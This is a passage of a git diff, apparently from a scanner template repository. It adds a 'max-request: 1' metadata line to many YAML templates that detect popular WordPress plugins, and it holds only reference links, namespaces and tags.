b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..1bb9a283ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..87721a245a 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..45e0dead0e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 